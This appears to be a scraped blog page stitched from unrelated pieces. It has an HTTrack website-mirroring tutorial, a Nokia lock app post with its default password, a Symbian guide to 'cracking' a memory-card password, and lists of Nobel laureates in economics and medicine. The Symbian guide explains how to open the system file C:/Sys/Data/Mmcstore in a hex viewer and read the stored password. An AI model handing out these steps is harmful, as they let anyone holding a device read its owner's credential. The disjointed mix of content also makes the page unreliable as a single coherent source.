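The PID in each finding can then be mapped to an executable with `tasklist /FI "PID eq <pid>"`, which lists the process even though it has no visible window.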

Download complete Website and save it on PC

When you discover an interesting website, you may want to copy the complete website to view it locally without an internet connection. If you are in a hurry, you can back up the entire website to a USB drive and view it afterward. This can be useful even if you just want to save thousands of images from a webpage in one click.

HTTrack is a tool to save all the webpages from a specified website. The downloaded website, when viewed offline, looks exactly as it appears online. An exact mirror of the website is downloaded to your hard disk with all the styles, background images and alignments kept intact. Links pointing out of the page are also taken into consideration, meaning those pages are downloaded as well. For example, if you have to download all the MP3 songs, Flash files and videos from a website at once, or only some of them using filters, then WinHTTrack is a feasible option.

The downloaded sites can be used in your regular browser, and there is no waiting time to load another page as all the pages are already stored offline on your local disk. Moreover, no active Internet connection is required to access it. Personally, I used it to show research pages of my project to the concerned professor where internet connectivity was poor.

How to download complete website?

Enter a project name and category (it can be anything, according to the site you are downloading). Next, enter the base path where the site will be downloaded.


More than one URL can be entered for download; specify them in the box. You can specify filters to download files with specific extensions, such as MP3, JPG or PNG, from the Set Options button.



Then press Finish to start copying. You can choose to shut down the PC after the download is completed, as it may take a few minutes depending on the size of the files hosted on the site.


Now, to view the downloaded website, go to the output folder and open the index.html file (the usual name), or open the HTTrack Website Copier program and click Browse Sites in the File menu.



Password for your Nokia Application

Download Active Lock:
Default Password: 12345

I have tested this application on my Nokia N70 mobile and it is working fine, and I hope this application will work well for you.

Reset Your Mobile Memory Card Password in 2 minutes

We usually set a password on our memory card for privacy and security, but the common mistake everyone makes at least once in a lifetime is forgetting the password. If you set a password for your mobile memory card, you should not forget it. If you do, the only option is to format the memory card with the help of a card reader, which means losing all the data stored on it. There is a way to break the security wall. If you are a Symbian device lover, then there is no need to worry about the password. You can crack it in a few minutes.



In this tutorial I am going to teach you how to reset your memory card password in easy steps. Before we start, you need to have X-plore (an application used to explore your system files and folders, even the hidden folders on your device).



Step1: Install X-plore on your mobile. If you want to download X-plore, search around the internet; you can download a free trial.

Step2: Open the X-plore app, press 0 (zero) and check that you have marked "show the system files"

Step3: Once you have done that, go to the following path: C:/Sys/Data/Mmcstore

Step4: Once you have reached it, press "3" under Options to open it in the hex viewer

Step5: Look at the third column; you will be able to see a line of code ! TMSD02G (c??"?x???6?2?6?2?6). Just check the characters between the "?"; they are your password, i.e. 62626



Note: If you have not set the password, then you will not be able to gain access to C:/Sys/Data


Economic Science

2010
Peter A. Diamond, Dale T. Mortensen, Christopher A. Pissarides
2009
Elinor Ostrom, Oliver E. Williamson
2008
Paul Krugman
2007
Leonid Hurwicz, Eric S. Maskin, Roger B. Myerson
2006
Edmund S. Phelps
2005
Robert J. Aumann, Thomas C. Schelling
2004
Finn E. Kydland, Edward C. Prescott
2003
Robert F. Engle III, Clive W.J. Granger
2002
Daniel Kahneman, Vernon L. Smith
2001
George A. Akerlof, A. Michael Spence, Joseph E. Stiglitz
2000
James J. Heckman, Daniel L. McFadden
1999
Robert A. Mundell
1998
Amartya Sen
1997
Robert C. Merton, Myron S. Scholes
1996
James A. Mirrlees, William Vickrey
1995
Robert E. Lucas Jr.
1994
John C. Harsanyi, John F. Nash Jr., Reinhard Selten
1993
Robert W. Fogel, Douglass C. North
1992
Gary S. Becker
1991
Ronald H. Coase
1990
Harry M. Markowitz, Merton H. Miller, William F. Sharpe
1989
Trygve Haavelmo
1988
Maurice Allais
1987
Robert M. Solow
1986
James M. Buchanan Jr.
1985
Franco Modigliani
1984
Richard Stone
1983
Gerard Debreu
1982
George J. Stigler
1981
James Tobin
1980
Lawrence R. Klein
1979
Theodore W. Schultz, Sir Arthur Lewis
1978
Herbert A. Simon
1977
Bertil Ohlin, James E. Meade
1976
Milton Friedman
1975
Leonid Vitaliyevich Kantorovich, Tjalling C. Koopmans
1974
Gunnar Myrdal, Friedrich August von Hayek
1973
Wassily Leontief
1972
John R. Hicks, Kenneth J. Arrow
1971
Simon Kuznets
1970
Paul A. Samuelson
1969
Ragnar Frisch, Jan Tinbergen

Physiology or Medicine

2010
Robert G. Edwards
2009
Elizabeth H. Blackburn, Carol W. Greider, Jack W. Szostak
2008
Harald zur Hausen, Françoise Barré-Sinoussi, Luc Montagnier
2007
Mario R. Capecchi, Sir Martin J. Evans, Oliver Smithies
2006
Andrew Z. Fire, Craig C. Mello
2005
Barry J. Marshall, J. Robin Warren
2004
Richard Axel, Linda B. Buck
2003
Paul C. Lauterbur, Sir Peter Mansfield
2002
Sydney Brenner, H. Robert Horvitz, John E. Sulston
2001
Leland H. Hartwell, Tim Hunt, Sir Paul M. Nurse
2000
Arvid Carlsson, Paul Greengard, Eric R. Kandel
1999
Günter Blobel
1998
Robert F. Furchgott, Louis J. Ignarro, Ferid Murad
1997
Stanley B. Prusiner
1996
Peter C. Doherty, Rolf M. Zinkernagel
1995
Edward B. Lewis, Christiane Nüsslein-Volhard, Eric F. Wieschaus
1994
Alfred G. Gilman, Martin Rodbell
1993
Richard J. Roberts, Phillip A. Sharp
1992
Edmond H. Fischer, Edwin G. Krebs
1991
Erwin Neher, Bert Sakmann
1990
Joseph E. Murray, E. Donnall Thomas
1989
J. Michael Bishop, Harold E. Varmus
1988
Sir James W. Black, Gertrude B. Elion, George H. Hitchings
1987
Susumu Tonegawa
1986
Stanley Cohen, Rita Levi-Montalcini
1985
Michael S. Brown, Joseph L. Goldstein
1984
Niels K. Jerne, Georges J.F. Köhler, César Milstein
1983
Barbara McClintock
1982
Sune K. Bergström, Bengt I. Samuelsson, John R. Vane
1981
Roger W. Sperry, David H. Hubel, Torsten N. Wiesel
1980
Baruj Benacerraf, Jean Dausset, George D. Snell
1979
Allan M. Cormack, Godfrey N. Hounsfield
1978
Werner Arber, Daniel Nathans, Hamilton O. Smith
1977
Roger Guillemin, Andrew V. Schally, Rosalyn Yalow
1976
Baruch S. Blumberg, D. Carleton Gajdusek
1975
David Baltimore, Renato Dulbecco, Howard Martin Temin
1974
Albert Claude, Christian de Duve, George E. Palade
1973
Karl von Frisch, Konrad Lorenz, Nikolaas Tinbergen
1972
Gerald M. Edelman, Rodney R. Porter
1971
Earl W. Sutherland, Jr.
1970
Sir Bernard Katz, Ulf von Euler, Julius Axelrod
1969
Max Delbrück, Alfred D. Hershey, Salvador E. Luria
1968
Robert W. Holley, Har Gobind Khorana, Marshall W. Nirenberg
1967
Ragnar Granit, Haldan Keffer Hartline, George Wald
1966
Peyton Rous, Charles Brenton Huggins
1965
François Jacob, André Lwoff, Jacques Monod
1964
Konrad Bloch, Feodor Lynen
1963
Sir John Carew Eccles, Alan Lloyd Hodgkin, Andrew Fielding Huxley
1962
Francis Harry Compton Crick, James Dewey Watson, Maurice Hugh Frederick Wilkins
1961
Georg von Békésy
1960
Sir Frank Macfarlane Burnet, Peter Brian Medawar
1959
Severo Ochoa, Arthur Kornberg
1958
George Wells Beadle, Edward Lawrie Tatum, Joshua Lederberg
1957
Daniel Bovet
1956
André Frédéric Cournand, Werner Forssmann, Dickinson W. Richards
1955
Axel Hugo Theodor Theorell
1954
John Franklin Enders, Thomas Huckle Weller, Frederick Chapman Robbins
1953
Hans Adolf Krebs, Fritz Albert Lipmann
1952
Selman Abraham Waksman
1951
Max Theiler
1950
Edward Calvin Kendall, Tadeus Reichstein, Philip Showalter Hench
1949
Walter Rudolf Hess, Antonio Caetano de Abreu Freire Egas Moniz
1948
Paul Hermann Müller
1947
Carl Ferdinand Cori, Gerty Theresa Cori, née Radnitz, Bernardo Alberto Houssay
1946
Hermann Joseph Muller
1945
Sir Alexander Fleming, Ernst Boris Chain, Sir Howard Walter Florey
1944
Joseph Erlanger, Herbert Spencer Gasser
1943
Henrik Carl Peter Dam, Edward Adelbert Doisy
1942
No Nobel Prize was awarded this year. The prize money was with 1/3 allocated to the Main Fund and with 2/3 to the Special Fund of this prize section.
1941
No Nobel Prize was awarded this year. The prize money was with 1/3 allocated to the Main Fund and with 2/3 to the Special Fund of this prize section.
1940
No Nobel Prize was awarded this year. The prize money was with 1/3 allocated to the Main Fund and with 2/3 to the Special Fund of this prize section.
1939
Gerhard Domagk
1938
Corneille Jean François Heymans
1937
Albert von Szent-Györgyi Nagyrápolt
1936
Sir Henry Hallett Dale, Otto Loewi
1935
Hans Spemann
1934
George Hoyt Whipple, George Richards Minot, William Parry Murphy
1933
Thomas Hunt Morgan
1932
Sir Charles Scott Sherrington, Edgar Douglas Adrian
1931
Otto Heinrich Warburg
1930
Karl Landsteiner
1929
Christiaan Eijkman, Sir Frederick Gowland Hopkins
1928
Charles Jules Henri Nicolle
1927
Julius Wagner-Jauregg
1926
Johannes Andreas Grib Fibiger
1925
No Nobel Prize was awarded this year. The prize money was allocated to the Special Fund of this prize section.
1924
Willem Einthoven
1923
Frederick Grant Banting, John James Rickard Macleod
1922
Archibald Vivian Hill, Otto Fritz Meyerhof
1921
No Nobel Prize was awarded this year. The prize money was allocated to the Special Fund of this prize section.
1920
Schack August Steenberg Krogh
1919
Jules Bordet
1918
No Nobel Prize was awarded this year. The prize money was allocated to the Special Fund of this prize section.
1917
No Nobel Prize was awarded this year. The prize money was allocated to the Special Fund of this prize section.
1916
No Nobel Prize was awarded this year. The prize money was allocated to the Special Fund of this prize section.
1915
No Nobel Prize was awarded this year. The prize money was allocated to the Special Fund of this prize section.
1914
Robert Bárány
1913
Charles Robert Richet
1912
Alexis Carrel
1911
Allvar Gullstrand
1910
Albrecht Kossel
1909
Emil Theodor Kocher
1908
Ilya Ilyich Mechnikov, Paul Ehrlich
1907
Charles Louis Alphonse Laveran
1906
Camillo Golgi, Santiago Ramón y Cajal
1905
Robert Koch
1904
Ivan Petrovich Pavlov
1903
Niels Ryberg Finsen
1902
Ronald Ross
1901
Emil Adolf von Behring